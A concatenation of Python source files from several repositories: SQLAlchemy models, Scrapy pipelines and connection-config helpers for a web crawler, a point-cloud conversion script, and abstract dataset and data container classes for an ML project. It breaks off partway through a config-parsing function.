self.UBINDTYPENAME = kw.get("UBINDTYPENAME", None)
self.UNITCODE = kw.get("UNITCODE", None)
self.UNITNAME = kw.get("UNITNAME", None)
self.XZQHBM = kw.get("XZQHBM", None)
self.create_ts = kw.get("create_ts", None)
self.id = kw.get("id", None)
self.is_del = kw.get("is_del", None)
self.metadata = kw.get("metadata", None)
self.reg_time = kw.get("reg_time", None)
self.update_ts = kw.get("update_ts", None)
class ItjuziCompany(Base, BaseModel):
__tablename__ = 'itjuzi_company'
id = Column(INTEGER(11), primary_key=True)
name = Column(String(255))
des = Column(String(255))
logo = Column(String(255))
web_id = Column(INTEGER(11))
is_del = Column(TINYINT(255))
create_ts = Column(INTEGER(11))
update_ts = Column(TIMESTAMP, server_default=text("CURRENT_TIMESTAMP"))
def __init__(self, *arg, **kw):
self.create_ts = kw.get("create_ts", None)
self.des = kw.get("des", None)
self.id = kw.get("id", None)
self.is_del = kw.get("is_del", None)
self.logo = kw.get("logo", None)
self.metadata = kw.get("metadata", None)
self.name = kw.get("name", None)
self.update_ts = kw.get("update_ts", None)
self.web_id = kw.get("web_id", None)
class ItjuziNew(Base, BaseModel):
__tablename__ = 'itjuzi_news'
id = Column(INTEGER(11), primary_key=True)
title = Column(String(255))
url = Column(String(255))
logo = Column(String(255))
web_id = Column(INTEGER(11))
is_del = Column(TINYINT(255))
create_ts = Column(INTEGER(11))
update_ts = Column(TIMESTAMP, server_default=text("CURRENT_TIMESTAMP"))
def __init__(self, *arg, **kw):
self.create_ts = kw.get("create_ts", None)
self.id = kw.get("id", None)
self.is_del = kw.get("is_del", None)
self.logo = kw.get("logo", None)
self.metadata = kw.get("metadata", None)
self.title = kw.get("title", None)
self.update_ts = kw.get("update_ts", None)
self.url = kw.get("url", None)
self.web_id = kw.get("web_id", None)
class Url(Base, BaseModel):
__tablename__ = 'wp_saas_url'
id = Column(INTEGER(11), primary_key=True)
domain = Column(String(255), index=True)
url = Column(String(255), index=True)
name = Column(String(255), index=True)
level = Column(INTEGER(11))
p_id = Column(INTEGER(11))
content = Column(Text)
title = Column(Text)
description = Column(Text)
keywords = Column(Text)
is_del = Column(TINYINT(1))
update_ts = Column(INTEGER(11))
create_ts = Column(INTEGER(11))
def __init__(self, *arg, **kw):
self.content = kw.get("content", None)
self.create_ts = kw.get("create_ts", None)
self.description = kw.get("description", None)
self.domain = kw.get("domain", None)
self.id = kw.get("id", None)
self.is_del = kw.get("is_del", None)
self.keywords = kw.get("keywords", None)
self.level = kw.get("level", None)
self.metadata = kw.get("metadata", None)
self.name = kw.get("name", None)
self.p_id = kw.get("p_id", None)
self.title = kw.get("title", None)
self.update_ts = kw.get("update_ts", None)
self.url = kw.get("url", None)
class Keyword(Base, BaseModel):
__tablename__ = 'wp_saas_keywords'
id = Column(INTEGER(11), primary_key=True)
words = Column(String(192), nullable=False, unique=True)
source = Column(INTEGER(1))
flag = Column(INTEGER(1))
update_ts = Column(TIMESTAMP, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
create_ts = Column(TIMESTAMP, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
def __init__(self, *arg, **kw):
self.create_ts = kw.get("create_ts", None)
self.flag = kw.get("flag", None)
self.id = kw.get("id", None)
self.metadata = kw.get("metadata", None)
self.source = kw.get("source", None)
self.update_ts = kw.get("update_ts", None)
self.words = kw.get("words", None)
class NewsSearch(Base, BaseModel):
__tablename__ = 'news_search'
id = Column(INTEGER(11), primary_key=True)
source_url = Column(String(255))
url = Column(String(255))
title = Column(String(255))
top_image = Column(String(255))
meta_img = Column(String(255))
movies = Column(LONGTEXT)
text = Column(String(255))
keywords = Column(LONGTEXT)
meta_keywords = Column(LONGTEXT)
tags = Column(LONGTEXT)
authors = Column(LONGTEXT)
publish_date = Column(String(255))
summary = Column(String(255))
is_parsed = Column(String(255))
download_state = Column(INTEGER(11))
download_exception_msg = Column(String(255))
meta_description = Column(String(255))
meta_lang = Column(String(255))
meta_favicon = Column(String(255))
meta_data = Column(LONGTEXT)
canonical_link = Column(String(255))
additional_data = Column(LONGTEXT)
link_hash = Column(String(255))
is_del = Column(INTEGER(11))
create_ts = Column(INTEGER(11))
update_ts = Column(TIMESTAMP)
def __init__(self, *arg, **kw):
self.additional_data = kw.get("additional_data", None)
self.authors = kw.get("authors", None)
self.canonical_link = kw.get("canonical_link", None)
self.create_ts = kw.get("create_ts", None)
self.download_exception_msg = kw.get("download_exception_msg", None)
self.download_state = kw.get("download_state", None)
self.id = kw.get("id", None)
self.is_del = kw.get("is_del", None)
self.is_parsed = kw.get("is_parsed", None)
self.keywords = kw.get("keywords", None)
self.link_hash = kw.get("link_hash", None)
self.meta_data = kw.get("meta_data", None)
self.meta_description = kw.get("meta_description", None)
self.meta_favicon = kw.get("meta_favicon", None)
self.meta_img = kw.get("meta_img", None)
self.meta_keywords = kw.get("meta_keywords", None)
self.meta_lang = kw.get("meta_lang", None)
self.metadata = kw.get("metadata", None)
self.movies = kw.get("movies", None)
self.publish_date = kw.get("publish_date", None)
self.source_url = kw.get("source_url", None)
self.summary = kw.get("summary", None)
self.tags = kw.get("tags", None)
self.text = kw.get("text", None)
self.title = kw.get("title", None)
self.top_image = kw.get("top_image", None)
self.update_ts = kw.get("update_ts", None)
self.url = kw.get("url", None)
class Product(Base, BaseModel):
__tablename__ = 'wp_saas_product'
id = Column(INTEGER(11), primary_key=True)
url_id = Column(INTEGER(11), index=True)
name = Column(String(255), index=True)
p_id = Column(INTEGER(11))
logo = Column(String(255))
intro = Column(LONGTEXT)
company_id = Column(INTEGER(11))
is_del = Column(TINYINT(1))
update_ts = Column(INTEGER(11))
create_ts = Column(INTEGER(11))
def __init__(self, *arg, **kw):
self.create_ts = kw.get("create_ts", None)
self.company_id = kw.get("company_id", None)
self.id = kw.get("id", None)
self.intro = kw.get("intro", None)
self.is_del = kw.get("is_del", None)
self.logo = kw.get("logo", None)
self.metadata = kw.get("metadata", None)
self.name = kw.get("name", None)
self.p_id = kw.get("p_id", None)
self.update_ts = kw.get("update_ts", None)
self.url_id = kw.get("url_id", None)
class ProductSearch(Base, BaseModel):
__tablename__ = 'product_search'
id = Column(INTEGER(11), primary_key=True)
source_url = Column(String(255))
url = Column(String(255))
title = Column(String(255))
top_image = Column(String(255))
meta_img = Column(String(255))
movies = Column(LONGTEXT)
text = Column(String(255))
keywords = Column(LONGTEXT)
meta_keywords = Column(LONGTEXT)
tags = Column(LONGTEXT)
authors = Column(LONGTEXT)
publish_date = Column(String(255))
summary = Column(String(255))
is_parsed = Column(String(255))
download_state = Column(INTEGER(11))
download_exception_msg = Column(String(255))
meta_description = Column(String(255))
meta_lang = Column(String(255))
meta_favicon = Column(String(255))
meta_data = Column(LONGTEXT)
canonical_link = Column(String(255))
additional_data = Column(LONGTEXT)
link_hash = Column(String(255))
is_del = Column(INTEGER(11))
create_ts = Column(INTEGER(11))
update_ts = Column(TIMESTAMP)
def __init__(self, *arg, **kw):
self.additional_data = kw.get("additional_data", None)
self.authors = kw.get("authors", None)
self.canonical_link = kw.get("canonical_link", None)
self.create_ts = kw.get("create_ts", None)
self.download_exception_msg = kw.get("download_exception_msg", None)
self.download_state = kw.get("download_state", None)
self.id = kw.get("id", None)
self.is_del = kw.get("is_del", None)
self.is_parsed = kw.get("is_parsed", None)
self.keywords = kw.get("keywords", None)
self.link_hash = kw.get("link_hash", None)
self.meta_data = kw.get("meta_data", None)
self.meta_description = kw.get("meta_description", None)
self.meta_favicon = kw.get("meta_favicon", None)
self.meta_img = kw.get("meta_img", None)
self.meta_keywords = kw.get("meta_keywords", None)
self.meta_lang = kw.get("meta_lang", None)
self.metadata = kw.get("metadata", None)
self.movies = kw.get("movies", None)
self.publish_date = kw.get("publish_date", None)
self.source_url = kw.get("source_url", None)
self.summary = kw.get("summary", None)
self.tags = kw.get("tags", None)
self.text = kw.get("text", None)
self.title = kw.get("title", None)
self.top_image = kw.get("top_image", None)
self.update_ts = kw.get("update_ts", None)
self.url = kw.get("url", None)
class ProductType(Base, BaseModel):
__tablename__ = 'wp_saas_product_type'
id = Column(INTEGER(11), primary_key=True)
product_id = Column(INTEGER(11))
type_id = Column(String(255))
is_del = Column(TINYINT(1))
update_ts = Column(INTEGER(11))
create_ts = Column(INTEGER(11))
def __init__(self, *arg, **kw):
self.create_ts = kw.get("create_ts", None)
self.id = kw.get("id", None)
self.is_del = kw.get("is_del", None)
self.metadata = kw.get("metadata", None)
self.product_id = kw.get("product_id", None)
self.type_id = kw.get("type_id", None)
self.update_ts = kw.get("update_ts", None)
class Types(Base, BaseModel):
__tablename__ = 'wp_saas_types'
id = Column(INTEGER(11), primary_key=True)
name = Column(String(255))
p_id = Column(String(255))
is_del = Column(TINYINT(1))
update_ts = Column(INTEGER(11))
create_ts = Column(INTEGER(11))
def __init__(self, *arg, **kw):
self.create_ts = kw.get("create_ts", None)
self.id = kw.get("id", None)
self.is_del = kw.get("is_del", None)
self.metadata = kw.get("metadata", None)
self.name = kw.get("name", None)
self.p_id = kw.get("p_id", None)
self.update_ts = kw.get("update_ts", None)
class ProductFromNews(Base, BaseModel):
__tablename__ = 'wp_saas_product_from_news'
id = Column(INTEGER(11), primary_key=True)
news_id = Column(INTEGER(11), index=True)
title = Column(String(255), index=True)
products = Column(String(255))
is_del = Column(TINYINT(1))
update_ts = Column(INTEGER(11))
create_ts = Column(INTEGER(11))
def __init__(self, *arg, **kw):
self.create_ts = kw.get("create_ts", None)
self.id = kw.get("id", None)
self.is_del = kw.get("is_del", None)
self.metadata = kw.get("metadata", None)
self.news_id = kw.get("news_id", None)
self.products = kw.get("products", None)
self.title = kw.get("title", None)
self.update_ts = kw.get("update_ts", None)
if __name__ == '__main__':
createInitFunction(BaiduAdvertisement)
```
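The declarative models above map the crawler's output tables one-to-one. A minimal query sketch follows; the connection URL, database name and credentials are placeholders, and `Keyword` is one of the classes defined above.
```python
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker

# Placeholder connection string; adjust driver, credentials and database name as needed.
engine = create_engine("mysql+pymysql://user:password@localhost:3306/saas?charset=utf8mb4")
session = sessionmaker(bind=engine)()

# Fetch the ten most recently updated keywords.
for row in session.query(Keyword).order_by(Keyword.update_ts.desc()).limit(10):
    print(row.id, row.words)
session.close()
```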
#### File: SqlAlchemy/Weibo/UserItemModel.py
```python
import XX.Model.SqlAlchemy.BaseModel as BM
from sqlalchemy import Column, String
from sqlalchemy.dialects.mysql import INTEGER, TINYINT
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
metadata = Base.metadata
class UserItem(Base, BM.BaseModel):
__tablename__ = 'user_items'
id = Column(INTEGER(11), primary_key=True)
uid = Column(INTEGER(11))
item_name = Column(String(60))
item_content = Column(String(255))
is_del = Column(TINYINT(1))
create_ts = Column(INTEGER(11))
update_ts = Column(INTEGER(11))
def __init__(self, *arg, **kw):
self.create_ts = kw.get("create_ts", None)
self.id = kw.get("id", None)
self.is_del = kw.get("is_del", None)
self.item_content = kw.get("item_content", None)
self.item_name = kw.get("item_name", None)
self.metadata = kw.get("metadata", None)
self.uid = kw.get("uid", None)
self.update_ts = kw.get("update_ts", None)
if __name__ == '__main__':
BM.createInitFunction(UserItem)
```
#### File: SqlAlchemy/ZhiHan/CarBrandsModel.py
```python
from sqlalchemy import Column, Integer, String
from sqlalchemy.ext.declarative import declarative_base
from XX.Model.SqlAlchemy.BaseModel import BaseModel
Base = declarative_base()
metadata = Base.metadata
class CarBrandsModel(Base, BaseModel):
__tablename__ = 'car_brands'
id = Column(Integer, primary_key=True)
brand_id = Column(Integer)
brands_web_id = Column(Integer, unique=True)
name = Column(String(255), index=True)
brandsIsInlet = Column(String(10))
is_del = Column(Integer)
create_ts = Column(Integer)
update_ts = Column(Integer)
__table_args__ = {
"mysql_charset": "utf8"
}
def __init__(self, *arg, **kw):
self.brand_id = kw.get("brand_id", None)
self.brandsIsInlet = kw.get("brandsIsInlet", None)
self.brands_web_id = kw.get("brands_web_id", None)
self.create_ts = kw.get("create_ts", None)
self.id = kw.get("id", None)
self.is_del = kw.get("is_del", None)
self.metadata = kw.get("metadata", None)
self.name = kw.get("name", None)
self.update_ts = kw.get("update_ts", None)
@staticmethod
def getBrandsByWebId(web_id, session):
return session.query(CarBrandsModel).filter(CarBrandsModel.brands_web_id == web_id).all()
```
#### File: SqlAlchemy/ZhiHan/ForumModel.py
```python
from XX.Model.SqlAlchemy.BaseModel import BaseModel
from sqlalchemy import Column, Integer, String, text
from sqlalchemy.dialects.mysql.types import TINYINT
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
metadata = Base.metadata
class Forum(Base, BaseModel):
__tablename__ = 'forum'
id = Column(Integer, primary_key=True)
name = Column(String(255))
spider_name = Column(String(255))
domain = Column(String(255))
logo = Column(String(255))
thread_count = Column(TINYINT(4), server_default=text("'1'"))
is_del = Column(Integer)
create_ts = Column(Integer)
update_ts = Column(Integer)
def __init__(self, *arg, **kw):
self.id = kw.get("id", None)
self.name = kw.get("name", None)
self.spider_name = kw.get("spider_name", None)
self.domain = kw.get("domain", None)
self.logo = kw.get("logo", None)
self.thread_count = kw.get("thread_count", None)
self.is_del = kw.get("is_del", None)
self.create_ts = kw.get("create_ts", None)
self.update_ts = kw.get("update_ts", None)
@staticmethod
def getSpiderNameByForumId(_id, session):
return session.query(Forum.spider_name).filter(Forum.id == _id).all()
```
#### File: SqlAlchemy/ZhiHan/ForumUrlModel.py
```python
from XX.Model.SqlAlchemy.BaseModel import *
from sqlalchemy import Column, Index, String
from sqlalchemy.dialects.mysql import INTEGER, TINYINT
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
metadata = Base.metadata
class ForumUrlModel(Base, BaseModel):
__tablename__ = 'forum_url'
__table_args__ = (
Index('forum_id', 'forum_id', 'url'),
)
id = Column(INTEGER(11), primary_key=True)
forum_id = Column(INTEGER(11))
forum_name = Column(String(255))
url = Column(String(255))
is_del = Column(TINYINT(4))
create_ts = Column(INTEGER(11))
update_ts = Column(INTEGER(11))
def __init__(self, *arg, **kw):
self.create_ts = kw.get("create_ts", None)
self.forum_id = kw.get("forum_id", None)
self.forum_name = kw.get("forum_name", None)
self.id = kw.get("id", None)
self.is_del = kw.get("is_del", None)
self.metadata = kw.get("metadata", None)
self.update_ts = kw.get("update_ts", None)
self.url = kw.get("url", None)
if __name__ == '__main__':
createInitFunction(ForumUrlModel)
```
#### File: Model/Struct/HBaseConn.py
```python
import functools
def get_hbase_conn_cfg(**kw):
d = dict()
d["host"] = kw.get("host", "localhost")
# d["username"] = kw.get("username", None)
# d["password"] = kw.get("pwd", None)
d["port"] = kw.get("port", 9090)
d["table"] = kw.get("table", "default")
return d
ubuntu_cfg = functools.partial(get_hbase_conn_cfg, host="192.168.1.44")
zhihan00_cfg = functools.partial(get_hbase_conn_cfg, host="192.168.1.50")
```
#### File: Model/Struct/RedisConn.py
```python
import functools
def get_redis_conn_cfg(**kw):
d = dict()
d["host"] = kw.get("host", "localhost")
d["pwd"] = kw.get("pwd", None)
d["port"] = kw.get("port", 6379)
d["db"] = kw.get("db", 0)
d["decode_responses"] = kw.get("decode_responses", True)
return d
ali_cfg = functools.partial(get_redis_conn_cfg, host="172.16.31.10", pwd="<PASSWORD>", db=0)
ali2_cfg = functools.partial(get_redis_conn_cfg, host="192.168.3.11", pwd="<PASSWORD>", db=0)
ubuntu_cfg = functools.partial(get_redis_conn_cfg, host="192.168.1.44", db=0)
local = functools.partial(get_redis_conn_cfg, host="localhost", db=0)
zhihan00 = functools.partial(get_redis_conn_cfg, host="zhihan00", db=0)
```
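The partials above only pre-fill keyword arguments of a plain config dict. A usage sketch, assuming the `redis` package is installed and the target server is reachable:
```python
import redis

cfg = local()  # any of the functools.partial factories defined above
client = redis.StrictRedis(host=cfg["host"], port=cfg["port"], password=cfg["pwd"],
                           db=cfg["db"], decode_responses=cfg["decode_responses"])
client.set("hello", "world")
print(client.get("hello"))  # -> "world"
```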
#### File: XX/Multiprocess/Callback.py
```python
def msg(msg, *arg, **kw):
print("---" * 60)
print("callback -------> {}".format(msg))
print("---" * 60)
if __name__ == "__main__":
pass
```
#### File: Scrapy/DM/LogDM.py
```python
import XX.Date.DatetimeHelper as ctime
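# NOTE: log_file is assumed to be provided by the project's file-logging helper; it is not imported in this module as written.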
class ToCrawlUrl(object):
@classmethod
def from_crawler(cls, crawler):
cls.settings = crawler.settings
return cls()
def process_request(self, request, spider):
save_path = ToCrawlUrl.settings.get("ROOT_PATH_LOG") + ctime.get_today() + "_to_crawl.log"
log_file(save_path, str(ctime.get_now_time()) + "\t" + spider.name + "\t" + request.url + "\n", method="a")
# Log which URLs were successfully crawled
class CrawledUrl(object):
@classmethod
def from_crawler(cls, crawler):
cls.settings = crawler.settings
return cls()
def process_response(self, request, response, spider):
save_path = CrawledUrl.settings.get("ROOT_PATH_LOG") + ctime.get_today() + "_crawled.log"
log_file(save_path, str(ctime.get_now_time()) + "\t" + spider.name + "\t" + str(
response.status) + "\t" + request.url + "\n",
method="a")
return response
```
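A sketch of how these downloader middlewares could be enabled in a Scrapy project's settings.py; the dotted module path and the log directory are assumptions based on the file location above.
```python
DOWNLOADER_MIDDLEWARES = {
    "XX.Scrapy.DM.LogDM.ToCrawlUrl": 543,
    "XX.Scrapy.DM.LogDM.CrawledUrl": 544,
}
ROOT_PATH_LOG = "/tmp/crawl_logs/"  # directory both middlewares prepend to the daily log file name
```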
#### File: Scrapy/Pipeline/PipeLine.py
```python
import json
import os
import time
from logzero import logger
from thrift.transport import TSocket
from thrift.protocol import TBinaryProtocol
# NOTE: the two imports below assume the standard Thrift-generated HBase Python bindings (the "hbase" package)
from hbase import Hbase
from hbase.ttypes import ColumnDescriptor, Mutation
import XX.DB.SqlAlchemyHelper as sa
import XX.Encrypt.EncryptHelper as enc
import XX.File.FileHelper as cf
import XX.HTML.HtmlHelper as chtml
import XX.Tools.BuiltinFunctions as bf
# File pipeline: append each item to today's JSON file
class FilePipeline(object):
@classmethod
def from_crawler(cls, crawler):
settings = crawler.settings
cls.cacheFilePath = settings.get("FUN_CACHE_FILE_PATH")
cls.settings = settings
return cls()
def process_item(self, item, spider):
# Process the item data
item = chtml.parseDict(item)
today = time.strftime("%Y_%m_%d", time.localtime(int(time.time())))
json_str = json.dumps(item, ensure_ascii=False)
# Save the data to a file
file_path = FilePipeline.settings.get("ROOT_PATH_JSON") + spider.name + os.sep + today + ".json"
cf.FileHelper.save_file(file_path, json_str + "\n")
return item
# Store items in MySQL
class MysqlPipeline(object):
@classmethod
def from_crawler(cls, crawler):
cls.settings = crawler.settings
cls.session = sa.SqlAlchemyHelper.get_session_by_cfg(cls.settings.get("MCFG"))
return cls()
def process_item(self, item, spider):
import importlib
module = importlib.import_module("Util.Json2Mysql", MysqlPipeline.settings.get("PROJECT_PATH"))
if hasattr(module, spider.name):
getattr(module, spider.name)(item, self.session)
else:
logger.info("No Json2Mysql function")
return item
# Store items in MongoDB
class MongoPipeline(object):
def process_item(self, item, spider):
return item
# Push items to a Kafka topic
class KafkaPipeline(object):
def __init__(self):
from pykafka import KafkaClient
self.client = KafkaClient(hosts="LOCALHOST" + ":6667")
def process_item(self, item, spider):
topicdocu = self.client.topics[spider.name]
producer = topicdocu.get_producer()
# Process the item data
item = chtml.parseDict(item)
json_str = json.dumps(item, ensure_ascii=False)
producer.produce(json_str)
bf.printFromHead(spider.name + "\tAdd kafka")
return item
class HivePipeline(object):
def process_item(self, item, spider):
return item
class SparkPipeline(object):
def process_item(self, item, spider):
return item
class StormPipeline(object):
def process_item(self, item, spider):
return item
class HBasePipeline(object):
@classmethod
def from_crawler(cls, crawler):
cls.settings = crawler.settings
return cls()
def __init__(self):
self.transport = TSocket.TSocket(self.settings.get("HBASE_HOST", "localhost"), self.settings.get("HBASE_PORT", 9090))
self.transport.open()
self.protocol = TBinaryProtocol.TBinaryProtocol(self.transport)
self.client = Hbase.Client(self.protocol)
# Check whether the table exists; create it if it does not
tables = self.client.getTableNames()
self.table_name = "crawl_" + self.settings.get("PROJECT_NAME", self.settings.get("BOT_NAME", "crawl"))
if self.table_name not in tables:
source = ColumnDescriptor(name='source')
data = ColumnDescriptor(name='data')
self.client.createTable(self.table_name, [source, data])
def process_item(self, item, spider):
# Save into the crawl_<project> table: row key = spider_name + md5(url), JSON payload in column data:json
# crawl_<project> > spider_name + md5(url) > data:json_str
url = item.get("url")
if url:
row = spider.name + "_" + enc.Encrypt.md5(url)
mutations = list()
mutations.append(Mutation(column="data:json", value=str(json.dumps(item, ensure_ascii=False))))
self.client.mutateRow(self.table_name, row, mutations)
logger.info("Pipeline Data 2 HBase\t" + row)
else:
logger.info("No url from spider \t" + spider.name)
return item
def close_spider(self, spider):
self.transport.close()
class TestPipeline(object):
@classmethod
def from_crawler(cls, crawler):
cls.settings = crawler.settings
return cls()
def process_item(self, item, spider):
print("===" * 44)
print(TestPipeline.settings)
print(dir(spider))
print(dir(self))
print("===" * 44)
```
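A sketch of wiring a subset of the pipelines above into a Scrapy project's settings.py; the dotted module path and setting values are assumptions.
```python
ITEM_PIPELINES = {
    "XX.Scrapy.Pipeline.PipeLine.FilePipeline": 300,
    "XX.Scrapy.Pipeline.PipeLine.MysqlPipeline": 400,
}
ROOT_PATH_JSON = "/tmp/crawl_json/"  # consumed by FilePipeline
# MCFG: connection config consumed by SqlAlchemyHelper.get_session_by_cfg; its exact shape depends on that helper
```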
#### File: XX/Scrapy/ReLoadCache.py
```python
import os
import pickle
import XX.File.FileHelper as uf
def reload_cache(cache_rp):
for fp, fn in uf.FileHelper.get_file_list(cache_rp):
yield pickle.load(open(fp + os.sep + fn, "rb"))
```
#### File: XX/Selenium/Headless.py
```python
from selenium import webdriver
def get(url):
options = webdriver.FirefoxOptions()
options.set_headless()
options.add_argument('-headless')
options.add_argument('--disable-gpu')
driver = webdriver.Firefox(firefox_options=options)
driver.get(url)
# Read the page source before closing the browser
html = driver.page_source
driver.close()
return html
if __name__ == '__main__':
print(get("http://httpbin.org/get"))
```
#### File: XX/String/RegExpHelper.py
```python
import re
class RegExpHelper():
# TODO: debug - also handle other image formats and image URLs that start with "img"
@staticmethod
def get_img_urls(html):
return re.findall(r'http.+\.jpg', html)
@staticmethod
def get_url_from_html(txt):
return re.findall(r"(?<=href=\").+?(?=\")|(?<=href=\').+?(?=\')", txt)
@staticmethod
def get_url_from_text(txt):
return re.findall(r"http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+", txt)
@staticmethod
def get_ip(txt):
return re.findall(r"((?:(?:25[0-5]|2[0-4]\d|((1\d{2})|([1-9]?\d)))\.){3}(?:25[0-5]|2[0-4]\d|((1\d{2})|([1-9]?\d))))", txt)
@staticmethod
def replace_continuous_blank_2_one(txt):
return re.sub(' +', ' ', txt)
@staticmethod
def get_date(txt):
if not txt or not isinstance(txt, str):
return
return re.findall(r"(\d{4}-\d{1,2}-\d{1,2})", txt)
@staticmethod
def repleaseEmoji(sourceStr, replaceStr=''):
if isinstance(sourceStr, str):
try:
co = re.compile('[\U00010000-\U0010ffff]')
except re.error:
import traceback
co = re.compile('[\uD800-\uDBFF][\uDC00-\uDFFF]')
return co.sub(replaceStr, sourceStr)
else:
return sourceStr
if __name__ == "__main__":
print(RegExpHelper.repleaseEmoji("加油, 我们与你同在![抱抱]🌹", "??111"))
exit()
content = "<td class='info_d'><div class='info'><a href='//car.autohome.com.cn/pic/series-s17694/49.html?pvareaid=101281'>图片</a><a href='spec/17694/config.html?pvareaid=101282'>参数配置</a>"
content = "https://www.jb51.net/article/98054.htm"
for l in RegExpHelper.get_url_from_text(content):
print(l)
```
#### File: XX/Tools/create_hive_table.py
```python
import pymysql
def get_table_info(table, schema='', ispartition=True):
cols = []
create_head = """ create external table if not exists {0}.{1}(\n""".format(schema, table)
if ispartition:
create_tail = """\npartitioned by(inc_day string)\nrow format delimited fields terminated by '\\t' \n location '/hivetable/{0}';""".format(table)
else:
create_tail = """\nrow format delimited fields terminated by '\\t' \nlocation '/hivetable/{0}';""".format(table)
connection = pymysql.connect(host='192.168.1.44',user='root',password='<PASSWORD>',db='sqoop',port=3306,charset='utf8')
try:
# Get a cursor
with connection.cursor(cursor=pymysql.cursors.DictCursor) as cursor:
sql = 'SHOW FULL FIELDS FROM {0}'.format(table)
cout = cursor.execute(sql) # returns the number of matched rows
try:
for row in cursor: # cursor.fetchall()
cols.append(row['Field'])
if 'bigint' in row['Type']:
row['Type'] = "bigint"
elif 'int' in row['Type'] or 'tinyint' in row['Type'] or 'smallint' in row['Type'] or 'mediumint' in row['Type'] or 'integer' in row['Type']:
row['Type'] = "int"
elif 'double' in row['Type'] or 'float' in row['Type'] or 'decimal' in row['Type']:
row['Type'] = "double"
else:
row['Type'] = "string"
create_head += row['Field'] + ' ' + row['Type'] + ' comment \'' + row['Comment'] + '\' ,\n'
except:
import traceback
traceback.print_exc()
print('Program error!')
finally:
connection.close()
create_str = create_head[:-2] + '\n' + ')' + create_tail
return cols, create_str # return the column list and the CREATE TABLE statement
cols, create_str = get_table_info("customer")
print(create_str)
``` |
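For reference, a call like the one at the bottom of the file produces a statement of roughly the following shape; the column names below are hypothetical.
```python
cols, create_str = get_table_info("customer", schema="ods", ispartition=True)
# create_str is roughly:
#   create external table if not exists ods.customer(
#   id bigint comment 'primary key' ,
#   name string comment 'customer name'
#   )
#   partitioned by(inc_day string)
#   row format delimited fields terminated by '\t'
#    location '/hivetable/customer';
```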
{
"source": "82magnolia/3DLineDetection",
"score": 3
} |
#### File: 3DLineDetection/python/convert_pcd.py
```python
import argparse
import os
import shutil
from glob import glob
import numpy as np
def ig_f(dir, files):
# Ignore files
return [f for f in files if os.path.isfile(os.path.join(dir, f))]
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='line_3d')
parser.add_argument('--file_dir', help='Directory where point clouds are located')
parser.add_argument('--new_file_dir', help='Directory where new point clouds will be saved')
args = parser.parse_args()
# Copy directories
shutil.copytree(args.file_dir, args.new_file_dir, ignore=ig_f)
# Get all point cloud filenames in file_dir
filenames = sorted(glob(os.path.join(args.file_dir, '**', '*.txt'), recursive=True))
os.chdir('../src/')
for idx, f in enumerate(filenames):
print(f"\n======== Progress: {idx + 1} / {len(filenames)} ========\n")
new_f = f.replace(args.file_dir, args.new_file_dir)
pcd = np.loadtxt(f)
np.savetxt(new_f, pcd[:, :3])
os.chdir('../python/')
``` |
{
"source": "82magnolia/ev_tta",
"score": 4
} |
#### File: base/data/data_container.py
```python
from abc import ABC, abstractmethod
from math import ceil
class DataContainer(ABC):
"""
Abstract class defining data container.
A typical data container will encompass all the utilities related to dataset generation and loading.
Note that cfg contains all the neccessary data needed to create a dataset.
"""
def __init__(self, cfg, **kwargs):
super(DataContainer, self).__init__()
self.cfg = cfg
# dataset is a dict containing different torch.utils.data.Dataset instances
self.dataset = {'train': None, 'test': None, 'val': None}
# dataloader is a dict containing different torch.utils.data.DataLoader instances
self.dataloader = {'train': None, 'test': None, 'val': None}
@abstractmethod
def gen_dataset(self, **kwargs):
"""
Method for generating dataset. Sets the key-value pairs in self.dataset.
"""
pass
@abstractmethod
def gen_dataloader(self, **kwargs):
"""
Method for creating dataloader. Sets the key-value pairs in self.dataloader.
It is highly recommended to write a custom collate_fn that passes data around as a dictionary;
this enables efficient code reuse.
"""
assert self.dataset is not None
class DataChunkContainer(DataContainer):
"""
Abstract class defining data chunk container. Data will be pre-loaded into RAM for faster data loading.
For DataChunkContainer to successfully work, the Dataset generated from gen_dataset should be an instance of ChunkDataset.
"""
def __init__(self, cfg, **kwargs):
super(DataChunkContainer, self).__init__(cfg)
self.chunk_every = ceil(self.cfg.chunk_size / self.cfg.batch_size)
def create_chunk(self, batch_idx, mode):
"""
Load chunk to RAM.
"""
if batch_idx % self.chunk_every == 0:
print(f"Creating chunk with index {self.dataset[mode].chunk_idx}")
self.dataset[mode].load_chunk()
def refresh_chunk(self, mode):
"""
Free chunk, and prepare for new epoch.
"""
print("Refreshing chunk!")
self.dataset[mode].restart_chunk()
self.dataset[mode].free_chunk()
self.dataset[mode].shuffle_index()
def release_chunk(self, mode):
"""
Free chunk to save RAM.
"""
print("Releasing chunk!")
self.dataset[mode].free_chunk()
```
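A minimal concrete container sketch, to show how the abstract hooks above are meant to be filled in; the cfg field `batch_size` and the toy tensors are assumptions for illustration.
```python
import torch
from torch.utils.data import DataLoader, TensorDataset

class ToyDataContainer(DataContainer):
    def gen_dataset(self, **kwargs):
        # Toy in-memory dataset standing in for a real one.
        data, labels = torch.randn(100, 3), torch.randint(0, 2, (100,))
        self.dataset['train'] = TensorDataset(data, labels)

    def gen_dataloader(self, **kwargs):
        super().gen_dataloader(**kwargs)  # run the base-class check
        self.dataloader['train'] = DataLoader(self.dataset['train'],
                                              batch_size=self.cfg.batch_size, shuffle=True)
```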
#### File: base/data/dataset.py
```python
from torch.utils.data import Dataset
class ChunkDataset(Dataset):
"""
Class implementing chunk-based loading.
"""
def __init__(self, cfg, mode='train'):
super(ChunkDataset, self).__init__()
self.cfg = cfg
self.mode = mode
self.chunk_idx = 0 # Next chunk index to load
def shuffle_index(self):
"""
Shuffle indices for re-sampling chunk.
"""
raise NotImplementedError
def load_chunk(self):
"""
Load a chunk to RAM.
"""
raise NotImplementedError
def restart_chunk(self):
self.chunk_idx = 0
def free_chunk(self):
"""
Free all reserved chunks to save RAM space.
"""
raise NotImplementedError
```
#### File: base/utils/parse_utils.py
```python
from collections import namedtuple
import configparser
from ast import literal_eval
from pathlib import Path
NO_PARSE = ['name', 'load_model'] # List of names to avoid parsing
EXCEPT_NONE = ['load_model']
def parse_ini(config_path: str):
